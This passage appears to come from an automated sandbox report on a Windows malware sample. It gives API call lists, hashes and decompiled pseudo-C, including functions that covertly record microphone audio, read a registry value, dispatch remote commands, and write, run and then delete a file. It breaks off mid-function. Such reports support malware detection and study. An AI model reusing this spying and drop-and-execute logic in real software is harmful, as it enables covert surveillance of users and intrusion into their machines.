                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B95B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                  • String ID: origmsc
                                  • API String ID: 643209241-68016026
                                  • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                  • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041290A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                  • String ID: ^"A
                                  • API String ID: 1083762089-1057680782
                                  • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                  • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411C4C, Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 15%
                                  			E00411C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E0040180C( &_v20, __eflags, 2));
					_push(E0040180C( &_v20, __eflags, 1));
					_push(E0040180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E00411D8A(E00412881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E00411A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E0040180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x41c1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x41c1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x41c1d3 = 1;
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                  0x00411c4c
                                  0x00411c53
                                  0x00411c5e
                                  0x00411c6d
                                  0x00411c72
                                  0x00411c8a
                                  0x00411c9a
                                  0x00411ca0
                                  0x00411ca6
                                  0x00411ca9
                                  0x00411cb3
                                  0x00411cb8
                                  0x00411cbb
                                  0x00411cbe
                                  0x00411d3c
                                  0x00411d47
                                  0x00411d57
                                  0x00411d58
                                  0x00411d60
                                  0x00411cc0
                                  0x00411cc0
                                  0x00411cc3
                                  0x00411d2b
                                  0x00411cc5
                                  0x00411cc5
                                  0x00411cc8
                                  0x00411d03
                                  0x00411d0a
                                  0x00411d10
                                  0x00411d22
                                  0x00411cca
                                  0x00411cca
                                  0x00411ccd
                                  0x00411cee
                                  0x00411cf3
                                  0x00411cf5
                                  0x00411cf8
                                  0x00411cf8
                                  0x00411ccf
                                  0x00411ccf
                                  0x00411cd0
                                  0x00411ce5
                                  0x00411cd2
                                  0x00411cd3
                                  0x00411cd9
                                  0x00411cd9
                                  0x00411cd3
                                  0x00411cd0
                                  0x00411ccd
                                  0x00411cc8
                                  0x00411cc3
                                  0x00411d6b
                                  0x00411d73
                                  0x00411d7c
                                  0x00411d87

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                  • SetEvent.KERNEL32(?), ref: 00411C6D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00411C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • SetEvent.KERNEL32(?), ref: 00411CF8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                  • String ID:
                                  • API String ID: 3236006214-0
                                  • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                  • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401519, Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00401519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				0x41b218->wFormatTag = 1;
				 *0x41b21a = 1;
				 *0x41b21c = 0x1f40;
				 *0x41b226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 =  *0x41b21c; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x41b1d0 = _t20;
				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x41b1a0->lpData = _t10;
				_t11 =  *0x41b1d8; // 0x0
				 *0x41b1a4 = _t11;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				waveInStart( *0x41b210);
				return 0;
			}











                                  0x00401519
                                  0x00401523
                                  0x0040152a
                                  0x0040153c
                                  0x00401545
                                  0x0040154e
                                  0x00401553
                                  0x0040155c
                                  0x00401561
                                  0x0040156a
                                  0x00401571
                                  0x00401578
                                  0x0040157f
                                  0x00401588
                                  0x0040158e
                                  0x00401595
                                  0x004015b7
                                  0x004015bd
                                  0x004015c2
                                  0x004015d5
                                  0x004015dd
                                  0x004015eb
                                  0x004015f0
                                  0x004015fb
                                  0x00401600
                                  0x00401606
                                  0x0040160c
                                  0x00401612
                                  0x00401618
                                  0x00401627
                                  0x00401633
                                  0x0040163d

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                  • atoi.MSVCRT ref: 0040157F
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                  • waveInStart.WINMM ref: 00401633
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 1097200658-0
                                  • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                  • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F153, Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                  • SetEvent.KERNEL32(?), ref: 0040F16D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040F18E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                    • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                    • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                    • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                    • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                    • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                    • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                    • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                    • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID:
                                  • API String ID: 3444260106-0
                                  • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                  • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413D3D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00413D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
